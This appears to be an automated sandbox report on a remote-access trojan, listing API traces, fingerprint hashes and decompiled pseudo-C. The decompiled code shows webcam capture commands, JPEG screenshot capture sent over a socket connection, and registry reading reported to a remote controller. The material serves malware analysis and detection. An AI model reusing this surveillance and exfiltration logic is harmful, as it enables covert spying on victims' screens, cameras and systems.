                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040E003
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E00F
                                          • DeleteFileA.KERNEL32(0040E3AF,?,?,?,?,00000000), ref: 0040E018
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E025
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040E02E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0040E3AF,?,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040E06A
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E073
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000003,?,?,?,?,00000000), ref: 0040E080
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,dat,?,?,?,?,00000000), ref: 0040E093
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E09F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0A8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,00000001,?,?,?,?,?,?,?,00000000), ref: 0040E0B5
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0C2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0D4
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0E1
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0ED
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0F9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E102
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E10B
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E117
                                            • Part of subcall function 0040DDA1: GdipDisposeImage.GDIPLUS(?,0040E125,?,?,?,?,00000000), ref: 0040DDAA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000), ref: 0040E128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$D@std@@@std@@$??1?$basic_string@$?c_str@?$basic_string@CreateV12@$??0?$basic_string@??2@?data@?$basic_string@?length@?$basic_string@CapsCompatibleD@1@@Device$??0?$basic_ifstream@??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ifstream@?close@?$basic_ofstream@?is_open@?$basic_ifstream@?read@?$basic_istream@?resize@?$basic_string@?seekg@?$basic_istream@?size@?$basic_string@?tellg@?$basic_istream@?write@?$basic_ostream@AddressBitmapD?$basic_ifstream@D?$basic_ofstream@D@2@@0@DeleteDisposeFileGdipH@2@Hstd@@ImageLibraryLoadProcV01@V01@@V10@V?$basic_string@V?$fpos@W4seekdir@ios_base@2@@mbstowcs
                                          • String ID: Shlwapi.dll$dat$image/png
                                          • API String ID: 3855994960-268849978
                                          • Opcode ID: b94d99f16394994babad2cfec5dda0844aa583130935d951c0e243812b5ed4c3
                                          • Instruction ID: 50900ce0a1674e933a04bd46031eee92378d76cf936f2abeadaca34bfabdd0a9
                                          • Opcode Fuzzy Hash: b94d99f16394994babad2cfec5dda0844aa583130935d951c0e243812b5ed4c3
                                          • Instruction Fuzzy Hash: 1161E972900119AFCB15ABA0EC9D9EE7B78FF54305F0045BAF506A60A0DFB45A89CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 00401CD1
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401CE0
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00401D00
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,camdlldata), ref: 00401D15
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401D2D
                                            • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32 ref: 0040530E
                                            • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                            • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initcamcap,00415268,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401D9F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401DA9
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getcamframe), ref: 00401DCA
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401E30
                                          • atoi.MSVCRT ref: 00401E37
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004151F0), ref: 00401F14
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F1D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$D@2@@0@V?$basic_string@$?length@?$basic_string@$??8std@@FileHstd@@V12@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@?find@?$basic_string@?substr@?$basic_string@CloseCreateD@1@@HandleMappingV01@V10@0@V10@@Viewatoi
                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$camdlldata$closecam$getcamframe$getcamsingleframe$initcamcap$nocamera$startcamcap
                                          • API String ID: 1871107935-2220771084
                                          • Opcode ID: 210e37a37f9e0c99d1be353a1af9e3b9112400b93629fd3c79e67747ea02e0e5
                                          • Instruction ID: 183ee02595da0eeb8311e1689f08cbbe36985a9d478a6cb767cb9b2a83c2c828
                                          • Opcode Fuzzy Hash: 210e37a37f9e0c99d1be353a1af9e3b9112400b93629fd3c79e67747ea02e0e5
                                          • Instruction Fuzzy Hash: 23519732901215ABCB14EBE1EC0AAEE7B68EF81314B14447BF805B71E1DBBC4584CB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E0040DA55(void* __edx, char _a4) {
                                          				char _v5;
                                          				intOrPtr* _v12;
                                          				char _v28;
                                          				char _v44;
                                          				char _v56;
                                          				char _v72;
                                          				char _v88;
                                          				char _v104;
                                          				char _v120;
                                          				char _v136;
                                          				char* _v140;
                                          				intOrPtr _v144;
                                          				intOrPtr _v148;
                                          				void* _v164;
                                          				char _v168;
                                          				char _v184;
                                          				char _v200;
                                          				intOrPtr _v264;
                                          				char _v272;
                                          				void* _t57;
                                          				char _t62;
                                          				intOrPtr* _t74;
                                          				char* _t78;
                                          				char* _t81;
                                          				char* _t82;
                                          				char* _t83;
                                          				void* _t84;
                                          				void* _t85;
                                          				char* _t90;
                                          				char* _t91;
                                          				char* _t92;
                                          				char* _t93;
                                          				char* _t94;
                                          				intOrPtr* _t140;
                                          				void* _t144;
                                          				void* _t145;
                                          				intOrPtr _t159;
                                          				intOrPtr _t160;
                                          				intOrPtr _t161;
                                          
                                          				_t159 =  *0x415abc; // 0x0
                                          				if(_t159 == 0) {
                                          					E0040DD21( &_v72, 0, 0, 0);
                                          					_push(0);
                                          					_push( &_v72);
                                          					_push(0x415abc);
                                          					L0040FF68();
                                          				}
                                          				_t160 =  *0x415ab8; // 0x0
                                          				if(_t160 == 0) {
                                          					 *0x415ab8 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                          				}
                                          				_t57 = E0040D71E( &_v44);
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t57);
                                          				_v12 =  *0x415ab8(_t57);
                                          				E0040DD42( &_v136, _t58, 0);
                                          				E0040D999(L"image/jpeg",  &_v184);
                                          				_t62 = 1;
                                          				_v168 = _t62;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				_v148 = _t62;
                                          				_v144 = 4;
                                          				_v140 =  &_a4;
                                          				_t140 =  *0x415ab8(0, 0);
                                          				E0040DE11( &_v184,  &_v136, _t140,  &_v184,  &_v168);
                                          				 *((intOrPtr*)( *_t140 + 0x30))(_t140,  &_v272, 1);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_v264, 0,  &_v5);
                                          				 *((intOrPtr*)( *_t140 + 0x14))(_t140, 0, 0, 0, 0);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_v264, 0);
                                          				 *((intOrPtr*)( *_t140 + 0xc))(_t140, 0);
                                          				_t74 = _v12;
                                          				 *((intOrPtr*)( *_t74 + 8))(_t74);
                                          				 *((intOrPtr*)( *_t140 + 8))(_t140);
                                          				_t78 =  &_v56;
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t78, 0xa);
                                          				__imp___itoa(_t78);
                                          				_t145 = _t144 + 0xc;
                                          				_t161 =  *0x415ac0; // 0x0
                                          				if(_t161 != 0) {
                                          					_t81 =  &_v88;
                                          					L0040FC1A();
                                          					_t82 =  &_v104;
                                          					L0040FC20();
                                          					_t83 =  &_v120;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					_t84 = E00402198(0x415ac0, _t145 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t83, _t83, _t82, _t82, _t81, _t81, "scrshot", 0x415268,  &_v56, 0x415268,  &_v28);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				} else {
                                          					E00402109(0x415ac0);
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					E00402168(0x415ac0);
                                          					E004021EB(0x415ac0, E0040DE63);
                                          					_t90 =  &_v120;
                                          					L0040FC1A();
                                          					_t91 =  &_v104;
                                          					L0040FC20();
                                          					_t92 =  &_v88;
                                          					L0040FC14();
                                          					_t93 =  &_v200;
                                          					L0040FC14();
                                          					_t94 =  &_v72;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					_t84 = E00402198(0x415ac0, _t145);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t94, _t94, _t93, _t93, _t92, _t92, _t91, _t91, _t90, _t90, "initializescrcap", 0x415268,  &_v56, 0x415268,  &_v28, 0x415268, 0x415b18);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_t85 = E0040DDA1(_t84,  &_v136);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t85;
                                          			}

                                          APIs
                                          • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,758EFF80,00415268,7313CB00), ref: 0040DA80
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,758EFF80,00415268,7313CB00), ref: 0040DA94
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(758EFF80,00415268,7313CB00), ref: 0040DAB3
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040DBA9
                                          • _itoa.MSVCRT ref: 0040DBB0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initializescrcap,00415268,?,00415268,?,00415268,00415B18), ref: 0040DC15
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,00415B18), ref: 0040DC22
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415B18), ref: 0040DC2F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC3F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC4C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC68
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC74
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC7D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC86
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040DC56
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,scrshot,00415268,?,00415268,?), ref: 0040DCAE
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040DCBB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040DCC8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040DCD2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCE7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD02
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD16
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                            • Part of subcall function 004021EB: CreateThread.KERNEL32 ref: 00402200
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$V10@0@$?size@?$basic_string@$??0?$basic_string@?c_str@?$basic_string@V10@V10@@$AddressCreateD@1@@GdiplusLibraryLoadProcStartupThreadV01@@_itoaconnectsocket
                                          • String ID: Shlwapi.dll$image/jpeg$initializescrcap$scrshot
                                          • API String ID: 3965320395-4246769023
                                          • Opcode ID: 3485ed177e6c1eb5429dcb5cd6c2bae28b102ccd90b4a18a1b4464b3ba66bd49
                                          • Instruction ID: 37569ab505e31cf5d0ce7ce049b818f28185ad388a6b3e05f3e852d4fdd55162
                                          • Opcode Fuzzy Hash: 3485ed177e6c1eb5429dcb5cd6c2bae28b102ccd90b4a18a1b4464b3ba66bd49
                                          • Instruction Fuzzy Hash: 28816472900109AFDB14EBA0DD8ADEE777CFF54304F10417AF506A7191EA785E89CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 41%
                                          			E00409577(char _a4, char* _a20, intOrPtr _a24) {
                                          				void* _v8;
                                          				char _v24;
                                          				char _v40;
                                          				char _v56;
                                          				char _v72;
                                          				char _v88;
                                          				char _v104;
                                          				char _v120;
                                          				char _v136;
                                          				char _v152;
                                          				void* _t29;
                                          				long _t30;
                                          				char* _t31;
                                          				char* _t36;
                                          				char* _t37;
                                          				char* _t38;
                                          				char* _t39;
                                          				char* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          				char* _t44;
                                          				char* _t54;
                                          				void* _t72;
                                          				void* _t74;
                                          
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          				_t29 = E004094DE( &_a4);
                                          				_t74 = _t72 - 0x10 + 0x10;
                                          				_t47 = 0;
                                          				_t30 = RegOpenKeyExA(_t29, _a20, 0, 0x20019,  &_v8);
                                          				_t89 = _t30;
                                          				if(_t30 != 0) {
                                          					_t31 =  &_v24;
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					E00402198(0x4159a8, _t74 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t31, _t31, "regmsg", 0x415268, "3");
                                          				} else {
                                          					E0040926A( &_v8, _t89, _v8);
                                          					_t54 = "0";
                                          					if(_a24 != 0) {
                                          						_t54 = "1";
                                          					}
                                          					_t36 =  &_v24;
                                          					L0040FC1A();
                                          					_t37 =  &_v120;
                                          					L0040FC20();
                                          					_t38 =  &_v88;
                                          					L0040FC14();
                                          					_t39 =  &_v56;
                                          					L0040FC14();
                                          					_t40 =  &_v104;
                                          					L0040FC14();
                                          					_t41 =  &_v40;
                                          					L0040FC14();
                                          					_t42 =  &_v72;
                                          					L0040FC14();
                                          					_t43 =  &_v152;
                                          					L0040FC14();
                                          					_t44 =  &_v136;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					E00402198(0x4159a8, _t74 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t37, _t37, _t36, _t36, "regopened", 0x415268, _t54, 0x415268, 0x415a00, 0x415268, 0x415998, 0x415268, 0x4159e8, 0x415268, 0x415a10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					RegCloseKey(_v8);
                                          					_t47 = 1;
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t47;
                                          			}

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00415268,00000000), ref: 0040958B
                                            • Part of subcall function 004094DE: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                                            • Part of subcall function 004094DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
